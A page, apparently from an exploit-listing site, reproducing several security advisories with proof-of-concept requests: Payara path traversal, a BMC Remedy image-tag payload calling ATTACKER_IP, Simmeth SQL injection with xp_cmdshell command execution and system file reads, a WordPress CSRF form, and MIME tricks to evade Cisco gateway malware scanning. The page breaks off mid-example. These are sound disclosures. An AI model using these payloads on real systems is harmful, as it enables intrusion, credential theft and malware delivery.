Latest exploits :: CodePwn

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221114-0 > ======================================================================= title: Path Traversal Vulnerability product: Payara Platform vulnerable version: Enterprise: <5.45.0 Community: <6.2022.1, <5.2022.4, <4.1.2.191.38 fixed version: Enterprise: 5.45.0 Community: 6.2022.1, 5.2022.4, 4.1.2.191.38 CVE number: CVE-2022-45129 impact: High homepage: https://www.payara.fish found: 2022-09-29 by: Michael Baer (Office Nuremberg) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Payara Micro Community is the open source, lightweight middleware platform of choice for containerized Jakarta EE application deployments. less than 70MB, Payara Micro requires no installation, configuration, or code rewrites." Source: https://www.payara.fish/products/payara-platform-community/ Business recommendation: ------------------------ The vendor provides an update for the affected versions which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the Payara Software by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Path Traversal Vulnerability (CVE-2022-45129) A path traversal similar to the old CVE-2021-41381 allows, under some circumstances, to bypass the protection of the WEB-INF/ and META-INF/ folders. It is possible to read files inside these directories of the deployed application. They mostly contain configuration files for the application but may also contain source code. Proof of concept: ----------------- 1) Path Traversal Vulnerability (CVE-2022-45129) a) (Setup) Deploy a web application at the root context (/). For this PoC, the following application was used: https://github.com/AKSarav/SampleWebApp =============================================================================== java -jar ./appserver/extras/payara-micro/payara-micro-distribution/target/payara-micro.jar --port 1234 --deploy app.war --contextroot / =============================================================================== This application uses the org.apache.catalina.servlets.DefaultServlet for serving files. The deployment at root (/) is crucial. The webapp has the following structure: . ├── WEB-INF │ ├── web.xml │ └── weblogic.xml ├── META-INF │ └── context.xml ├── index.html └── welcome.jsp b) (Attack) The attacking payload is an HTTP request with a path starting with ../<webapp-name>/ (note that it does not start with /). To issue this request, a netcat connection can be used: =============================================================================== $ nc localhost 1234 GET ../app/WEB-INF/web.xml HTTP/1.1 Host: abc =============================================================================== The server's response: =============================================================================== HTTP/1.1 200 OK Server: Payara Micro #badassfish Accept-Ranges: bytes ETag: W/"688-1664529724289" Last-Modified: Fri, 30 Sep 2022 09:22:04 GMT Content-Type: application/xml Content-Length: 688 X-Frame-Options: SAMEORIGIN <?xml version="1.0" encoding="UTF-8"?> [...] =============================================================================== It is possible to access all files in the app's directory /app. The issue arises because the leading ../ is not detected to escape the context and later the code of StandardContextValve.java only checks the beginning of the path for forbidden directories /META-INF/ and /WEB-INF/. =============================================================================== requestPath.toUpperCase().startsWith("/META-INF/", 0) =============================================================================== Vulnerable / tested versions: ----------------------------- The vulnerability has been found in version 5.2022.3 (using jdk8-openjdk 8.345.u01-1) and was verified as well on the Payara6 branch with the latest commit during the time of the test: e5f68cda7a72c0c15fb55b724fe5d2e1e6255510 (using jdk11-openjdk 11.0.16.1.u1-2). In both cases, the application was self-compiled from the official GitHub repository on an Arch Linux distribution. According to the vendor, "This vulnerability affects ALL the distributions of the Payara Platform (Server Full, Server Web, Micro, Embedded, Docker images) in every edition and major version.". The vulnerable versions are all before 6.2022.1, 4.1.2.191.38, 5.2022.4 (Community Edition) and 5.45.0 (Enterprise Edition). Vendor contact timeline: ------------------------ 2022-10-05: Contacting vendor through security@payara.fish asking for encryption key. Vendor agreed to proceed without encrypted channel. 2022-10-06: Sent security advisory to vendor. 2022-10-08: Vendor cannot reproduce vulnerability. 2022-10-10: Sending additional / more detailed information. 2022-10-12: Vendor confirms the vulnerability. 2022-10-17: Contacting vendor to coordinate release date. 2022-10-25: Vendor notifies that fix is applied and live in repository, we should wait for marketing to put patch notes online. 2022-11-02: Contacting vendor to ask for list of affected and fixed versions and CVE number and whether marketing already sent out the information. No reply. 2022-11-09: Identifying new version & patch notes are already available online. Requesting CVE number through MITRE. 2022-11-10: Sending CVE number to vendor 2022-11-11: Informing vendor about public release date on 2022-11-14 2022-11-14: Public release of security advisory. Solution: --------- The vendor fixed the software to detect illegal path traversals. The fixed versions are * 6.2022.1 (Community Edition) * 5.2022.4 (Community Edition) * 4.1.2.191.38 (Community Edition) * 5.45.0 (Enterprise Edition) The Community Edition can be downloaded from the vendor's website: https://www.payara.fish/downloads/payara-platform-community-edition/ The Enterprise Edition can be requested by the sales team of Payara. Further information regarding the vulnerability and releases can be found at the following web site of the vendor: https://blog.payara.fish/whats-new-in-the-november-2022-payara-platform-release Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Michael Baer / @2022 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221110-0 > ======================================================================= title: HTML Injection product: BMC Remedy ITSM-Suite vulnerable version: 9.1.10 (= 20.02 in new versioning scheme) fixed version: 22.1 CVE number: CVE-2022-26088 impact: Low homepage: https://www.bmc.com/it-solutions/remedy-itsm.html found: 2021-08-11 by: Daniel Hirschberger (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix ITSM service provide out of-the-box IT Information Library (ITIL) service support functionality. Remedy ITSM Suite and BMC Helix ITSM service streamline and automate the processes around IT service desk, asset management, and change management operations. It also enables you to link your business services to your IT infrastructure to help you manage the impact of technology changes on business and business changes on technology — in real time and into the future. In addition, you can understand and optimize the user experience, balance current and future infrastructure investments, and view potential impact on the business by using a real-time service model." Source: https://docs.bmc.com/docs/itsm91/home-608490971.html Business recommendation: ------------------------ The vendor provides an updated version which should be installed immediately. The vendor states that: > We have done hardening in version 22.1. > However, we do not agree with assigning the CVE to this vulnerability. > As mentioned previously this is an informative vulnerability, and no real impact is demonstrated. Nevertheless, this can be used to trigger actions on internal services via CSRF or exfiltrate information. Vulnerability overview/description: ----------------------------------- 1) HTML Injection (CVE-2022-26088) An authenticated attacker who can forward incidents per email is able to inject a limited set of HTML tags. This is accomplished by inserting arbitrary content into the "To:" field of the email. There is a filtering mechanism that prevents the injection of many HTML tags, for example <script>, and it also removes event handlers. An attacker is able to insert an image tag with an arbitrary src URL. After sending the email, an entry is appended into the activity log of the incident which states that $USER has sent an email to <X> recipients. Upon clicking on the number <X>, the injected HTML code is loaded and executed. By inserting an <img> with an arbitrary "src" attribute, an attacker can force the user's browser to make requests to his specified URL. This can be used to trigger actions on internal services via CSRF or exfiltrate information. Proof of concept: ----------------- 1) HTML Injection (CVE-2022-26088) When an incident is viewed, there is a button which allows forwarding the incident by mail. After entering a TO address and the body of the email, it can be sent by clicking on the send button. The HTML injection can be performed by intercepting this request and changing the 'Email.To.InternetEmail' parameter. The modified request is: ------------------------------------------------------------------------------- PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1 Host: TARGET Cookie: […] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 X-Xsrf-Token: SOME_TOKEN Content-Length: ADAPT_AS_NEEDED Te: trailers Connection: close { "worknote": "pentest", "access": true, "Email.From.Person": { "email": "SOME_SENDING_MAIL", "fullName": "Pentest - SEC Consult", "loginId": "USERNAME" }, "Email.Subject": "SOME_SUBJECT", "Email.Body": "test2", "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>a@example.test", "workInfoType": 16000 } ------------------------------------------------------------------------------- The parameter Email.To.InternetEmail contains the payload. In this case an image tag containing the IP of the attacker was inserted: "<img src=http://LOCAL_IP:8001/>a@example.test" The a@example.test is needed to pass the email validation step and example.test was used to prevent sending out real emails. After this step, the information that $USER has sent an email to 1 recipient will be appended in the activity log of this incident. Now we start a local netcat listener with the command $ nc -vnlp 8001 Now we click on the number '1' in the activity log and see that the browser issues a request to our 'netcat' instance. This confirms that the browser tries to load the image from the specified URL. Vulnerable / tested versions: ----------------------------- The following version has been tested: * 9.1.10 this corresponds to version 20.02 as stated at the following URL: https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping Vendor contact timeline: ------------------------ 2021-09-07: Contacting vendor through email (appsec@bmc.com). 2021-09-28: Vendor states that they did not get the first email. 2021-09-29: Resending the advisory to their renewed GPG key. 2021-10-29: Fix pending, request to delay publication. 2021-11-18: Vulnerability is fixed and the fix is being evaluated. 2022-01-17: Asking for a status update. 2022-01-17: Vulnerability is fixed, no scheduled release. 2022-01-24: Tentative release on 2022-03-09; discussing impact 'best practice' vs 'low'. 2022-02-24: Fixed in Smart-IT 22.1, release postponed. 2022-03-30: Release postponed to May 2022. 2022-04-20: Asking if the fixed version will be released in May. 2022-05-17: Asking if the fixed version will be released in May. 2022-05-23: Release rescheduled to end of June/July 2022-08-04: Asking for status 2022-08-05: Product was released 2022-08-31: Asking for link to update 2022-09-01: Vendor does not agree with getting a CVE assigned, impact is explained again 2022-09-06: Vendor asks for final version of advisory 2022-09-06: Asking vendor for a new GPG key because of expiry 2022-09-07: Sending the final advisory to the vendor 2022-09-12: Vendor will check the advisory and answer in 1 or 2 days 2022-09-14: Vendor states that their application is not vulnerable to CSRF and asks if other data could be leaked via the HTTP request 2022-09-15: We clarify that their application does not seem to be vulnerable to CSRF but the HTML injection allows CSRFing other applications in the intranet. Also we did not have time to assess if other data besides User-Agent and the client's IP can be leaked. 2022-10-04: We request an update to the previous mail. 2022-10-19: Vendor sticks to their own original impact analysis. 2022-11-10: Public release of security advisory. Solution: --------- Upgrade to version 22.1 or later which can be downloaded at the vendor's page: https://www.bmc.com/support/resources/product-downloads.html Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Daniel Hirschberger / @2022 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221109-0 > ======================================================================= title: Multiple Critical Vulnerabilities product: Simmeth System GmbH Supplier manager (Lieferantenmanager) vulnerable version: < 5.6 fixed version: 5.6 CVE number: CVE-2022-44012, CVE-2022-44013, CVE-2022-44014, CVE-2022-44015, CVE-2022-44016, CVE-2022-44017 impact: critical homepage: https://www.simmeth.net found: 2022-03-01 by: Steffen Robertz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are an innovative B2B software provider for supply chain management, especially in the areas of supplier management over the entire supplier lifecycle and quality control, supply chain key figures and reporting. Our medium-sized family business is a reliable, practice-oriented partner with an extraordinary wealth of experience: since 2002, our currently more than 70 medium-sized and corporate customers have trusted our solutions and our pragmatically oriented expertise." Source: https://www.simmeth.net/en/company/about-us Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. An in-depth security analysis performed by security professionals is highly advised, to identify and resolve potential further critical security issues.   Vulnerability overview/description: ----------------------------------- 1) SQL Injection leading to Remote Code Execution (CVE-2022-44015) An attacker can inject raw SQL queries. By activating MSSQL features, the attacker is able to execute arbitrary commands on the MSSQL server. 2) Faulty API Design (CVE-2022-44014) A faulty API design allows an attacker to fetch arbitrary SQL tables per design. This will leak all user passwords and MSSQL hashes. 3) Local File Access (CVE-2022-44016) An attacker can download arbitrary files from the web server by abusing an API call. 4) Leak of Simmeth's SMTP password A cleartext password for the email account "LM@simmeth.net" is leaked during the login process. 5) Stored Cross-Site Scripting (CVE-2022-44012) An attacker can execute JavaScript code in the browser of the victim if a site is loaded. The victim's encrypted password can be stolen and most likely be decrypted. 6) Authentication Bypass (CVE-2022-44013) An attacker can access multiple API calls without authentication. Thus, all outlined attacks can be executed without knowing any valid credentials. 7) Errors in Session management (CVE-2022-44017) Due to errors in the session management, an attacker can log back into a victim's account after the victim logged out. This is due to the credentials not being cleaned from the local storage after logout. 8) Information Disclosure Multiple requests were giving verbose error messages. This helps an attacker in finding and abusing a vulnerability. Proof of concept: ----------------- 1) SQL Injection leading to Remote Code Execution (CVE-2022-44015) Following API call can be used to execute arbitrary SQL queries via a subquery or stacked query in the table name. Because of vulnerability 6, only a valid username is required to send the request. --------------------------------- POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1 Content-Length: 1264 [...] { "Credential": { "Mandant": { "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml", "ConnectionString": { "Available": false, "System": "****" }, "Encryption": 1, "IsWithRegistration": true, "Name": "****" }, "Username": "simmeth", "System": "****" }, "ResultTab": { "AutoLoad": false, "Createable": true, "Databases": [ { "System": "****", "Tables": [ { "Columns": [], "Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--", "Relations": [], "Results": [ { "ColumnName": "*" } ] } ] } ], "Name": "Results", "PageSize": 2000 }, "Ids": {}, "SecondaryIds": {}, "Constraints": [], "DateConstraints": {}, "LogicOperator": 0, "PageNumber": 0, "Sortings": {}, "TableFilters": {}, "GroupByField": null, "Aggregates": {}, "isExport": false } ------------------- The POC above shows an example subquery, which will respond with the resulting dataset. Stacked queries will be executed, however, the results will not be contained in the web server's reply. The example query will dump the MSSQL password hashes. Further attacks include arbitrary file read with the following query: (SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents )sub;-- And code execution via the xp_cmdshell extended procedure: (SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell 'nslookup some.domain';-- 2) Faulty API Design (CVE-2022-44014) The API design allows the frontend to supply an arbitrary table name (called <TABLE NAME HERE> in the POC below) into the following request. Because of vulnerability 6, only a valid username is required to send the request. --------------------------------- POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1 Content-Length: 1264 [...] { "Credential": { "Mandant": { "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml", "ConnectionString": { "Available": false, "System": "****" }, "Encryption": 1, "IsWithRegistration": true, "Name": "****" }, "Username": "simmeth", "System": "****" }, "ResultTab": { "AutoLoad": false, "Createable": true, "Databases": [ { "System": "****", "Tables": [ { "Columns": [], "Name": "<TABLE NAME HERE>", "Relations": [], "Results": [ { "ColumnName": "*" } ] } ] } ], "Name": "Results", "PageSize": 2000 }, "Ids": {}, "SecondaryIds": {}, "Constraints": [], "DateConstraints": {}, "LogicOperator": 0, "PageNumber": 0, "Sortings": {}, "TableFilters": {}, "GroupByField": null, "Aggregates": {}, "isExport": false } ------------------- This is a fault by design, as the attacker has full control of the table name. Therefore, an arbitrary table such as the user table (ACL_Benutzer_Admin_Einkauf and ACL_Benutzer) can be read. 3) Local File Access (CVE-2022-44016) The "GetImages" API call can be abused to read arbitrary files from the file system. This is due to the API allowing to set the image path from the frontend. By pointing the base path to C:\, all files can be accessed. Because of vulnerability 6, the request requires no credentials. ----------------------- POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1 Content-Length: 229 [...] {"Credential":{ "Mandant":{ "ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml" }, }, "ImagesPath":"C:\\", "ListImageNames":[ "Windows\\win.ini", "boot.ini", "Windows\\system32\\eula.txt", "Windows\\System32\\drivers\\etc\\hosts" ] } -------------------- The files are returned base64 encoded. Thus, even binary data can be extracted from the server. 4) Leak of Simmeth's SMTP password The following API call will return the current configuration. The configuration seems to contain cleartext credentials from Simmeth's SMTP server. The request does not require any credentials. ----------------- POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1 Content-Length: 70 Content-Type: application/json { "Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml",} } ---------------- The server responds with: --------------- [...] "KPIIntro":{ "IsAccessLog":true, "MailSettings":{ "Host":"vwp4261.webpack.hosteurope.de", "IsAuthentification":true, "IsSSL":false, "LoginName":"wp10481666-supply", "Password":"K***********a", "Port":"25", "Sender":"LM@simmeth.net" [...] -------------- Thus, an attacker could send phishing mails from an official Simmeth account. 5) Stored Cross-Site Scripting (CVE-2022-44012) The following request can be used to store JavaScript code into the database. It will be fetched and executed in the victim's browser, once the site is visited. Because of vulnerability 6, only a valid username is required to send the request. -------------- POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1 Content-Length: 3311 {"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml","ConnectionString ":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"}, "Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName" :"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=x onerror=alert(document.domain)>test","Lie_ID":4167}, [...] --------------- The XSS can be used to steal the encrypted passwords from the local storage. As the API uses cleartext passwords with every request, it is most likely possible to exfiltrate the passwords in cleartext as well. 6) Authentication Bypass (CVE-2022-44013) All API calls start by supplying the Credential Object. ---------------- "Credential": { "Mandant": { "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml", "ConnectionString": { "Available": false, "System": "****" }, "Encryption": 1, "IsWithRegistration": true, "Name": "****" }, "Username": "simmeth", "Password: "*********" "System": "****" }, ---------------- However, the password can just be removed. It seems to be only checked on the login API call. Thus, all requests can be made with just a username. The tested environment contained a User called "simmeth". Most likely this is a default user and thus always available, lowering the requirements for authenticated requests even further. 7) Errors in Session management (CVE-2022-44017) An attacker can abuse a session management vulnerability in order to log back into a user account after the user logged out. The encrypted password and username saved in the local storage of the web browser is not cleared on logout and always stays valid. Hence, only the state of the frontend state changes and the user appears to be logged out. An attacker can force the frontend state back into the logged in state by visiting: https://<your-host>/LMS/LM/#main 8) Information Disclosure The application replies with verbose error messages, when triggering exceptions. This can help an attacker to gain knowledge about the backend and aid in the development of exploits. Entering e.g. a single apostrophe into the table name of vulnerability 2 will cause the web server to print a full stack trace as well as the rest of the SQL query. Hence, the SQL statement can easily be updated to execute properly. Vulnerable / tested versions: ----------------------------- The test was conducted in version 5.4 which was found to be vulnerable. Vendor contact timeline: ------------------------ 2022-04-01: Contacting vendor through info@simmeth.net 2022-04-01: Simmeth requested to know in which customer's environment the vulnerabilities were discovered. 2022-04-04: SEC Consult's customer agreed to disclose their company name to Simmeth. 2022-04-04: Simmeth claims that a new version has been deployed on 18.03.2022 and already contains fixes. SEC Consult requests the version number of the fixed version. 2022-04-06: Simmeth communicates the fixed version numbers, advisory is being sent per unencrypted email. 2022-04-07: Simmeth will verify if all vulnerabilities are already fixed. 2022-04-20: Requested status. Vendor replies that our vulnerabilities are different/new and currently being fixed. 2022-04-25: Simmeth states that they will require two weeks to fix the vulnerabilities. A new API will be created until the end of the year. 2022-06-08: Simmeth sends changelog and states that all vulnerabilities have been fixed. 2022-06-13: Asking regarding CVE numbers, Simmeth states that patching customers will take until end of July. 2022-09-02: Asking about CVE numbers and if all customers are patched. 2022-09-05: Some customers are not yet patched. Current version is phased out by the end of september. All customers will have to upgrade until then. SEC Consult will request CVE numbers. 2022-10-05: Requested status update. 2022-10-17: All customers are updated. 2022-11-09: Coordinated release of security advisory. Solution: --------- The vendor provides a patched version 5.6 which fixes the identified security issues. Please approach your vendor support contact in order to receive the patches. Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Robertz / @2022 </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: BeCustom Wordpress Plugin Vendor URL: https://muffingroup.com/betheme/features/be-custom/ Type: Cross-Site Request Forgery [CWE-253] Date found: 2021-10-28 Date published: 2022-11-10 CVSSv3 Score: 5.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N) CVE: CVE-2022-3747 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== BeTheme BeCustom 1.0.5.2 and below 4. INTRODUCTION =============== Built in-house add-on, perfect for agencies and web developers will let you rebrand Be & WordPresss Admin to your own product by replacing all the Be & Muffin logos with own. This tool is supplied exclusively to the customers of Betheme and allows for changes like: complete dashboard customization, replacement of logos, colors managment and much more. With just a few clicks, you will turn the Be & Muffin brand into yours, thanks to which you will increase the trust of your customers. Moreover, from now on you can also customize the WPLogin page. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The WordPress plugin lacks an anti-CSRF protection on all of its functionalities, which ultimately allows an attacker to (amongst others): - Set custom brandings - Enable/Disable BeCustom features - Modify the WP Login view - Modify the BeDashboard texts Since there is no anti-CSRF token protecting these functionalities, they are vulnerable to Cross-Site Request Forgery attacks allowing an attacker to perform a variety of attacks as mentioned above. To successfully exploit this vulnerability, a user with the right to access the plugin must be tricked into visiting an arbitrary website while having an authenticated session in the application. 6. PROOF OF CONCEPT =================== An exemplary exploit to reset the plugin's configuration: <html> <body> <form action="http://localhost/wp-admin/admin.php?page=be_custom_branding" method="POST"> <input type="hidden" name="betheme_label" value="" /> <input type="hidden" name="betheme_url_slug" value="" /> <input type="hidden" name="replaced_logo_url" value="" /> <input type="hidden" name="replaced_theme_image" value="" /> <input type="hidden" name="replaced_theme_desc" value="" /> <input type="hidden" name="replaced_theme_author" value="Muffin Group 1337" /> <input type="hidden" name="submit" value="Save changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> 7. SOLUTION =========== Update to BeCustom 1.0.5.3 8. REPORT TIMELINE ================== 2022-10-28: Discovery of the vulnerability 2022-10-28: CVE requested from Wordfence (CNA) 2022-10-28: Wordfence assigns CVE-2022-3747 2022-11-01: Vendor notification 2022-11-07: No response. Sent another notification. 2022-11-08: Opened up a security support case on envato.com 2022-11-xx: Vendor publishes version 1.0.5.3 without notification which fixes this issue 2022-11-10: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories </code></pre>

<pre><code> This report is being published within a coordinated disclosure procedure. The researcher has been in contact with the vendor but not received a satisfactory response within a given time frame. As the attack complexity is low and exploits have already been published by a third party there must be no further delay in making the threads publicly known. The researcher prefers not to take credit for their findings. Evading Malware Detection by Cisco Secure Email Gateways ======================================================== Cisco Secure Email Gateways, formerly known as Cisco Ironport Email Security Appliances, that are configured to detect malicious email attachments, can easily be circumvented. A remote attacker can leverage error tolerance and different MIME decoding capabilities of email clients, compared with the gateway, to evade detection of malicious payloads by anti-virus components on the gateway. Method 1: Cloaked Base 64 ------------------------- Step-by-step instruction: 1. Prepare an email with the malicious attachment with a commonplace email client or employing standard MIME encoding, using content-transfer-encoding base64. 2. Insert CR+LF line breaks at random places in the base64 encoded block so that the lines have different lengths, but in a way that groups of four base64 characters (encoding three bytes) stay together. This is intended to evade naïve heuristics to detect base64 even out of context, while not violating the MIME standard. 3. Before the content-transfer-encoding header of the attachment, insert another contradictory header "Content-Transfer-Encoding: quoted-printable". This does violate the MIME standard. 4. Remove any content-length headers of the message, if present. A complete email prepared in this way may look like this: ----------------------- begin example ----------------------- From: Mallory <mallory@example.com> To: Alice <alice@example.com> Date: Mon, 27 Jun 2022 18:29:22 +0200 Subject: Your present Mime-Version: 1.0 Message-Id: <b31a762c.8b44.63b67b5a@example.com> Content-type: multipart/mixed; boundary=boundary_ef5dcd26 --boundary_ef5dcd26 Content-type: text/plain Content-Transfer-Encoding: quoted-printable Here is your present. --boundary_ef5dcd26 Content-type: application/octet-stream Content-Disposition: attachment; filename="present.zip" Content-Transfer-Encoding: quoted-printable Content-Transfer-Encoding: base64 UEsD BAoAAAAAAN2Q 21Q8z1FoRAAAAEQAAAAJABwAZWlj YXIuY29tVVQJAAOh [... more similar lines skipped ...] CwAB BPgDAAAE6QMAAFBLBQYAAAAAAQABAE8A AACHAAAAAAA= --boundary_ef5dcd26-- ----------------------- end example ----------------------- Emails prepared in this fashion will pass through affected gateways with a verdict of being clean from malware, even if the attachment is otherwise easily recognizable malware such as the Eicar test virus. Many popular email clients, on the other hand, will present the attached file and faithfully reproduce it upon saving. Affected systems: This exploit was successfully tested with a zip file containing the Eicar test virus and Cisco Secure Email Gateways with AsyncOS 14.2.0-620, 14.0.0-698, and others. Affected Email Clients were Microsoft Outlook for Microsoft 365 MSO (Version 2210 Build 16.0.15726.20070) 64-bit, Mozilla Thunderbird 91.11.0 (64-bit), Vivaldi 5.5.2805.42 (64-bit), Mutt 2.1.4-1ubuntu1.1, and others. Method 2: yEnc Encoding ----------------------- yEncode or short yEnc is an encoding typically employed by usenet clients. Some email clients are capable of decoding MIME parts with this encoding, too. A remote attacker using this encoding for a malicious email attachment will evade malware detection by affected gateways but may succeed in delivering the payload to victims if they use particular email clients. Other email clients will store the attachment in an undecoded and thus not directly harmful form. An email prepared in this way may look like this: ----------------------- begin example ----------------------- From: Mallory <mallory@example.com> To: Alice <alice@example.com> Date: Mon, 27 Jun 2022 18:29:22 +0200 Subject: Your present Mime-Version: 1.0 Message-Id: <b31a762c.8b44.63b67b5a@example.com> Content-type: multipart/mixed; boundary=boundary_ef5dcd26 --boundary_ef5dcd26 Content-type: text/plain Content-Transfer-Encoding: quoted-printable Here is your present. --boundary_ef5dcd26 Content-type: application/octet-stream Content-Disposition: attachment; filename="present.zip" Content-Transfer-Encoding: x-yencode =ybegin line=128 size=236 name=file.bin [... binary content skipped ...] =yend size=236 --boundary_ef5dcd26-- ----------------------- end example ----------------------- Affected Systems: This exploit was successfully tested with a zip file containing the Eicar test virus and Cisco Secure Email Gateways with AsyncOS 14.2.0-620, 14.0.0-698, and others. An affected Email Client was Mozilla Thunderbird 91.11.0 (64-bit). Method 3: Cloaked Quoted-Printable ---------------------------------- This method is similar to method 1 with the roles of quoted-printable and base64 swapped. The payload has to be encoded quoted-printable, but with each byte rather than just non-printable bytes encoded and on separate lines with continuation. The contradicting headers now come in the order base64, quoted-printable. An email prepared in this way may look like this: ----------------------- begin example ----------------------- From: Mallory <mallory@example.com> To: Alice <alice@example.com> Date: Mon, 27 Jun 2022 18:29:22 +0200 Subject: Your present Mime-Version: 1.0 Message-Id: <b31a762c.8b44.63b67b5a@example.com> Content-type: multipart/mixed; boundary=boundary_ef5dcd26 --boundary_ef5dcd26 Content-type: text/plain Content-Transfer-Encoding: quoted-printable Here is your present. --boundary_ef5dcd26 Content-type: application/octet-stream Content-Disposition: attachment; filename="present.zip" Content-Transfer-Encoding: base64 Content-Transfer-Encoding: quoted-printable =50= =4B= =03= =04= [... more 